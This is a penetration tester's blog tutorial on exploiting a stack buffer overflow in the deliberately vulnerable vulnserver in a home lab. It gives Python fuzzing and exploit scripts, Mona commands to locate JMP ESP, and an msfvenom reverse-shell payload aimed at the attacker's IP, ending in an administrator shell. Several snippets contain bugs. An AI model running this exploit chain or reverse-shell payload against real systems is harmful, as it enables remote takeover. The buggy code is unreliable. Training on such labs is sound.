<!doctype html>
<html lang="en-us">
  <head>
    <title>Notes - Windows Buffer Overflows // FMisi&#39;s security.log</title>
    <link rel="shortcut icon" href="../favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.105.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="FMisi" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="../../stiluslapom.css" />

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes - OSCP Preparation Cheat Sheet"/>
<meta name="twitter:description" content=""/>
    <meta property="og:title" content="Notes - OSCP Preparation Cheat Sheet" />
	<meta name="og:description" content=""/>
<meta property="og:type" content="article" />
<meta property="og:url" content="https://fmisi.github.io/notes/4-maintain-access/index.html" /><meta property="article:section" content="notes" />
<meta property="article:published_time" content="2022-07-01T23:18:05+13:00" />
<meta property="article:modified_time" content="2022-07-01T23:18:05+13:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://fmisi.github.io/"><img class="app-header-avatar" src="../../avatar.jpg" alt="FMisi" /></a>
      <span class="app-header-title">FMisi</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="../../index.html">/root</a>
             - 
          
          <a class="app-header-menu-item" href="../../htb/index.html">/htb</a>
             - 
          
		  <a class="app-header-menu-item" href="../case-studies/index.html">/case-studies</a>
             - 
		  
          <a class="app-header-menu-item" href="../../notes/index.html">/notes</a>
      </nav>
      <p>FMisi is a professional penetration tester.</p></br>
      <a style="font-size: smaller;" href="../../../privacy/index.html">Privacy Policy</a></br>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="fmisi" data-description="Support me on Buy me a coffee!" data-message="" data-color="#40DCA5" data-position="Right" data-x_margin="18" data-y_margin="18"></script>
      <h1 class ="post-title">Notes - Windows Buffer Overflows</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Mar 27, 2023
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          20 min read
        </div>
      </div>
    </header>
    <div class="post-content"></br>
	A buffer overflow is a type of software vulnerability that occurs when a program attempts to write more data to a buffer, which is a temporary storage area in a computer's memory, than it can actually hold.</br>This can cause the extra data to overflow into adjacent memory locations, potentially overwriting important data and causing the program to crash or behave in unexpected ways.</br></br>In some cases, this can even allow an attacker to execute malicious code or take control of the affected system.

</br>Buffer overflows can occur in a variety of programs, including web applications, operating systems, and network services.</br>They are often caused by programming errors such as using unsafe functions, not validating input properly, or not checking the size of input data before writing it to a buffer.

</br></br>To prevent buffer overflows, developers can use safe programming practices such as bounds checking, input validation, and secure coding practices like using memory-safe languages.</br>Additionally, system administrators can use intrusion detection systems and firewalls to detect and block malicious traffic that attempts to exploit buffer overflow vulnerabilities.</br>
<h3>Anatomy of the Memory</h3>
A typical computer's processor with Intel x86 architecture has a memory anatomy which looks like the following.</br>
The kernel section is located at the top of the memory.</br>
The stack section - which is the most interesting for buffer overflows - is located under the kernel section.</br>
The heap section is located under the stack section.</br>
The data section is located undert the heap section.</br>
Finally, the text section is located under the data section.</br>
The stack section and the heap section are large compared to the other sections.</br>
The heap section - if it is not the same size as the stack section - is the largest.
<h3>Anatomy of the Stack</h3>
A typical computer's processor with Intel x86 architecture has a stack anatomy which looks like the following.</br>
The ESP (Extended Stack Pointer) register is located at the top of the stack.</br>
Under ESP is the Buffer Space where we can store our input.</br>
Finally there is the EBP (Extended Base Pointer) register which is at the bottom of the stack, under the EBP register.</br>
Reaching the end of the stack there is the EIP (Extendid Instruction Pointer) register.</br>
Controlling the EIP register by being able the write to it can lead to buffer overflow vulnerability if the place for the shellcode is/can be large enough.</br>
<h3>Steps of Buffer Overflow</h3>
1. Spiking
<pre>Searching for a vulnerable part</br>of the program</pre>
2. Fuzzing
<pre>We send a bunch of characters for</br>the program and see</br>if we can crash it</pre>
3. Finding the Offset
<pre>If we can crash it, we search for</br>at what point we can crash it</br>(this point is called the offset)</pre>
4. Overwriting EIP
<pre>We utilize the Offset</br>to overwrite the EIP</pre>
5. Finding Bad Characters</br>
6. Finding the Right Module</br>
7. Generating Shellcode</br>
8. Root!</br>
<h3>1. Spiking</h3>
In this entry, the environment where we test looks like the following.</br>
We have an attacker machine running Kali Linux (the tools to be utilized are found on Parrot OS too) and a machine running the most recent version of Windows with 32 bit architecture.</br>
The Kali Linux has an IP address of 192.168.20.131 and the Windows machine has an IP address of 192.168.1.90, both machines are on the 192.168.0.0/16 subnet, and can communicate with each other.</br>
For the purpose of this entry, the Windows machine runs vulnserver, a server that we can use to learn about buffer overflows.</br>
The Windows machine also has Immunity Debugger downloaded.</br>
Fortunately, Windows Defender and other antivirus solutions picks vulnserver.exe up and they block it.</br>
Let's assume that Windows Defender and other antivirus solutions are turned off on the Windows machine.</br>
First things first, we start vulnserver.exe application with administrative privileges.</br>
We do the same with Immunity Debugger.</br>
In Immunity Debugger, we click File --> Attach and search for the vulnserver process.</br>
We click on the vulnserver process and click on the Attach button.</br>
If something has been attached to Immunity Debugger, it gets paused.</br>
The run it, we do not need to search for the Run button.</br>
It could be more convenient to press F9 and it will resume the application from the Paused state.</br></br>
The vulnserver application listens on port 9999 by default.</br>
The Windows machine's IP address is 192.168.1.90.</br>
Let's set up a netcat listener so we can examine how this application works.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span># nc -nv 192.168.1.90 9999</span>
</span></span><span style="display:flex;"><span>Welcome</span>
</span></span><span style="display:flex;"><span>HELP</span>
</span></span><span style="display:flex;"><span>Valid Commands:</span>
</span></span><span style="display:flex;"><span>STATS [...]</span>
</span></span><span style="display:flex;"><span>[...]</span>
</span></span><span style="display:flex;"><span>TRUN [...]</span>
</span></span><span style="display:flex;"><span>[...]</span>
</span></span><span style="display:flex;"><span>EXIT</span>
</span></span><span style="display:flex;"><span>EXIT</span>
</span></span><span style="display:flex;"><span>GOODBYE</span>
</code></div>
Interesting. The application accepts input after most of the valid commands.</br>
We will take a look at the STATS and the TRUN commands only, but in a real test, we would look at all of the commands.</br>
It is advisable to write spike scripts for them.</br>
Let's do this now!</br>
stats.spk:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-spike" data-lang="spike"><span style="display:flex;"><span><span>s_readline();</span>
</span></span><span style="display:flex;"><span>s_string("STATS ");</span>
</span></span><span style="display:flex;"><span>s_string(" ");</span>
</code></div>
trun.spk:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-spike" data-lang="spike"><span style="display:flex;"><span><span>s_readline();</span>
</span></span><span style="display:flex;"><span>s_string("TRUN ");</span>
</span></span><span style="display:flex;"><span>s_string(" ");</span>
</code></div>
Let's try to send a bunch of A characters to the specified input fields with generic_send_tcp and the spike scripts.</br>
<b>Make sure Immunity Debugger is showing the Running state and the application is not crashed before executing the commands!</br>
The application and Immunity Debugger must be restarted every time and the application must be reattached every time and the application must be "Running" (not "Paused") before making a step AND after putting one or more files to one of Immunity Debugger's folder to ensure this!</b>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span># generic_send_tcp 192.168.1.90 9999 stats.spk 0 0</span>
</code></div>
With the stats.spk script, we did not achive a crash whatsoever.</br>
Maybe we will have more luck with another spike script.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span># generic_send_tcp 192.168.1.90 9999 trun.spk 0 0</span>
</code></div>
Excellent!</br>The Immunity Debugger shows that the application has been Paused and down left we can see there is an Access violation message.</br>
On the Registers view we can see that the EIP register's value has been overwritten to 41414141.</br>
41 stands for A in hex code so the EIP has been overwritten with four A characters.</br>
We see a bunch of A characters as the EAX register's value and we see a /.:/ sign before the A characters.</br>
This will be importtant in the Fuzzing part.</br>
First step is done.</br>
<h3>2. Fuzzing</h3>
We can crash the application and we know what input field we can utilize to achive the crash of the application.</br>
Let's determine the place in memory where the crash happens.</br>
We can do it easily with a script.</br>
Let's make and execute the script now!</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 1.py</span>
</code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import sys, socket</br>from time import sleep</br></br>buffer = "A" * 100</br></br>while True:</br>    try:</br>        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</br>        s = connect(('192.168.1.90', 9999))</br>        s.send(('TRUN /.:/' + buffer, 9999))</br>        s.close()</br>        sleep(1)</br>        buffer = buffer + "A" * 100</br>    except:</br>        print("Fuzzing crashed at %s bytes" % str(len()))</br>        sys.exit()</span>
</code></div>
Remember the /.:/ part as the EAX register's value? We put it after the TRUN command so the application understands the remaining input.</br>
Let's execute the script, wait for a little and cancel the execution if it doesn't stop without cancelling!
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 1.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./1.py</br>^CFuzzing crashed at 2700 bytes</span></code></div>
It looks like ther fuzzing crashed at 2700 bytes. Unfortunately, it doesn't necessarily mean that the offset is at 2700 bytes.</br>
Let's find the offset now!
<h3>3. Finding the Offset</h3>
ceil(2700) = ? = 3000.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000</br>Aa0[...]</br>*copy*</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import sys, socket</br></br>offset = "Aa0[...]"</br></br>try:</br>    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>    s.connect(('192.168.1.90', 9999))</br>    s.send(('TRUN /.:/' + offset))</br>    s.close()</br></br>except:</br>    print("Error connecting to server")</br>    sys.exit()</br></span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
After executing this script, we can see in Immunity Debugger that the EIP register's value changed to 386F4337.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337</br>[*] Exact match at offset 2003</span></code></div>
Solution for step number three: the offset is at the 2003rd byte.
<h3>4. Overwriting the EIP</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import sys, socket</br></br>shellcode = "A" * 2003 + "B" * 4</br></br>try:</br>    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>    s.connect(('192.168.1.90', 9999))</br>    s.send(('TRUN /.:/' + shellcode))</br>    s.close()</br></br>except:</br>    print("Error connecting to server")</br>    sys.exit()</br></span></code></div>
We don't need to issue the chmod command if we just modify a script that is already executable but I will issue the chmod command anyway.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
In Immunity Debugger, we can see that - for example - the EBP register's value changed to 41414141 but the EIP register's value is not 41414141 now but 42424242.</br>
42 is hex code for B.</br>
We have just successfully overwritten the EIP register!
<h3>5. Finding Bad Characters</h3>
When we generate/write shellcode, we must know what characters are good for the shellcode and what characters are not good for the shellcode.</br>
To find bad characters, we can run all the hex characters through the application and see if any of then act up.</br>
By default, the null byte (/x00) character acts up, so we don't worry about it and remember that the /x00 is a bad character.</br>
Let's go to <a href="https://github.com/cytopia/badchars">https://github.com/cytopia/badchars</a> page and copy the badchars = ( "\x01\[...]") stuff under Python.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import sys, socket</br></br>badchars = ("\x01\[...]"</br>)</br></br>shellcode = "A" * 2003 + "B" * 4 + badchars</br></br>try:</br>    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>    s.connect(('192.168.1.90', 9999))</br>    s.send(('TRUN /.:/' + shellcode))</br>    s.close()</br></br>except:</br>    print("Error connecting to server")</br>    sys.exit()</br></span></code></div>
Do not put \x00 as the part of the badchars int the script as it can cause problems.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
It is the ESP register's value that we have to follow in dump to find bad characters.</br>
In Immunity Debugger, right click on the ESP register's value and select "Follow in Dump".</br>
We cannot see any anomaly in the Hey dump view, which means the \x00 character is the only bad character.</br>
We have successfully found all bad characters.</br>
Let's see an example of another application's hex dump.</br></br>
<img src="image.png" height="65%" width="65%" alt="hex dump of another app"></br></br>
If we see this, the B0 character itself is <b>not</b> a bad character.</br>
Furthermore, if we see B0 characters next to each other, only the first one from the left marks the place of a bad character.</br>
On the picture, the places where the bad characters can be found are marked with a red quadrilateral.
<h3>6. Finding the Right Module</h3>
A right module is a DLL or something similar that does not have memory protection ( such as DEP, ASLR, SSDH, etc.).</br>
Download mona.py to the Windows machine from here: <a href="https://github.com/corelan/mona">https://github.com/corelan/mona</a>.</br>
Put in mona.py here: C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands</br>
Let's use the mona script in Immunity Debugger.</br>
Write the following and press Enter in the bottom line.</br></br>
!mona modules</br></br>
Among other things, we see the following:</br></br>
False | False | False | False | False | [...]\essfunc.dll</br></br>
The essfunc.dll does not have any memory protections so it will be a right module for our purposes.</br>
We need the op code equivalent to the JMP ESP assembly instruction to make the application's execution jump to a place where it waits for other commands, leading to Remote Code Execution (RCE).</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># locate nasm_shell</br>[...]</br>/usr/[...]/nasm_shell.rb</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># /usr/[...]/nasm_shell.rb</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-nasm" data-lang="nasm"><span style="display:flex;">
<span><span>nasm> JMP ESP</br>00000000    FFE4    jmp esp</span></code></div>
The JMP ESP assembly instruction's op code equivalent is FFE4.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-nasm" data-lang="nasm"><span style="display:flex;">
<span><span>nasm> exit</span></code></div>
In Immunity Debugger, we issue the following command in the bottom barand press Enter:</br></br>
!mona find -s "\xff\xe4" -m essfunc.dll</br></br>
Among other things, we see the following:</br></br>
[*] Results:
0x625011af
[...]
0x62501205</br></br>
We need the very first address, which is 0x625011af.</br>
The 32 bit architecture for an operating system is little endian ==> we have to provide the result for the shellcode not just in hex format, but in reverse order!</br>
Let's do this now!</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import sys, socket</br></br>shellcode = "A" * 2003 + "\xaf\x11\x50\x62"</br></br>try:</br>    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>    s.connect(('192.168.1.90', 9999))</br>    s.send(('TRUN /.:/' + shellcode))</br>    s.close()</br></br>except:</br>    print("Error connecting to server")</br>    sys.exit()</br></span></code></div>
Let's minimize and maximize the Immunity Debugger in a way that we can see the default views.</br>
In Immunity Debugger, we have to click on the bluish black button on the upper bar, also known as the "Enter expression to follow" button.</br>
We have to enter the first address as expression without the 0x part.</br>
Enter 625011af and press OK.</br>
After that, we should find FFE4 JMP ESP.</br>
We have to set a breakpoint here. Press F2 to do this.</br>
By doing this, we achieve an overflow, the program "fills up", waiting for further instructions.
Let's execute our script and see what's up (of course, make sure now too that the application is running and is not in "Paused" state).</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
In Immunity Debugger on the bottom part we see that "Breakpoint at essfunc.625011af".</br>
625011af is exactly the EIP register's value now which means the essfunc.dll is indeed a right module.
<h3>7. Generating Shellcode</h3>
The shellcode must contain a non-staged payload as we are goind to utilize it while listening with netcat.</br>
The netcat tool can only listen to non-staged payloads, it is essentially deef when it comes to staged payloads as it can only hear the stages separate to each other.</br>
Let's generate a non-staged payload with msfvenom.</br>
Note that by setting the EXITFUNC to thread, the exploit will be more stable.</br>
The -f is the file type switch, the -a is the architecture switch, the -b is the bad characters switch.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.20.131 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"</br>[...]</br>Payload size: 351 bytes</br>[...]</br>"\xbe[...]</br>\x58"  *copy without the semicolon*</br>;</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import sys, socket</br></br>overflow = ("\xbe\[...]\x58")</br></br>shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow</br></br># 2003 bytes, this will take to EIP</br># when we reach EIP, we give the address of the jump,</br># we jump to the instruction series with this</br># ("\x90" * 32 + overflow),<br># the "\x90" * 32 will be the knobs.</br># The knobs are the padding between the jump address and the overflow,</br># this makes the exploit more stable</br></br>try:</br>    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>    s.connect(('192.168.1.90', 9999))</br>    s.send(('TRUN /.:/' + shellcode))</br>    s.close()</br></br>except:</br>    print("Error connecting to server")</br>    sys.exit()</br></span></code></div>
Done. Let's try getting a shell.
<h3>8. Root!</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># nc -lvnp 4444</span></code></div>
Immunity Debugger is not necessary, but the vulnserver must be running.</br>
On another tab on the Kali machine:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># .2.py</span></code></div>
Looking back to the tab with netcat running, we see that we got a shell!</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># nc -lvnp 4444</br>C:\[...]> whoami</br>whoami</br>COMPUTER\ADMINISTRATOR</br>C:\[...]\></span></code></div>
</div>
</br></br>
~Thank you for reading~
<h3 id="useful-references">Useful references</h3>
<ul>
<li><a href="https://github.com/cytopia/badchars">https://github.com/cytopia/badchars</a></li>
<li><a href="https://github.com/corelan/mona">https://github.com/corelan/mona</a></li>
</ul>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
